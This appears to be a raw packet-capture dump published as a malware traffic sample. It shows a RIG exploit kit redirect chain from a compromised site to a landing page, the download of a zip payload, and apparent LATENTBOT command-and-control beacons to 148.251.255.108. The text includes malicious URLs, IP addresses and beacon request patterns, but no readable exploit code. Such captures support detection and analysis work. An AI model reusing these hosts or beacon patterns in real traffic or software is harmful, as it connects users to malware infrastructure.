RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@…”m..
.6……P…S….P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1…6…..

..R.4…P.X{./k..P.@[&i……..
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E…Kl@…gf..
..R.4…P.X{./k..P.@[.’..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

..R.4…P.X}./k..P.?[.x……..
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E…L4@…e…
..R.4…P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E…MH@…e…
..R.4…P.X.T/l..P.@U!…GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:….R.4..
..P../l…X..P. …..

….l.%.P~…..+@P.@[……….
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…N.@…RD..
….l.%.P~…..+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv…l..
..P.%..+@~…P..0….HTTP/1.1 200 OK
CONTENT-LENGTH: 0

….l.%.P~…..+fP.@Q……….
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@…P…
….l.%.P~…..+fP.@Qw…GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ…l..
..P.&.t.v…%P…….HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

….l.(.P……..P.@[B………
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@…Q…
….l.(.P……..P.@[….GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD…l..
..P.(……..P…….HTTP/1.1 200 OK

R..N…P.@[.\……..
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…O8@…Q…
….l.*.P
R..N…P.@[K…GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

….l.4…U….M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM…l..
….4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E…V.@…JT..
….l.3…..]…6P.=.M…POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T….l..
….3…6….P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x

E…V.@…JR..
….l.3………mP.=…..POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45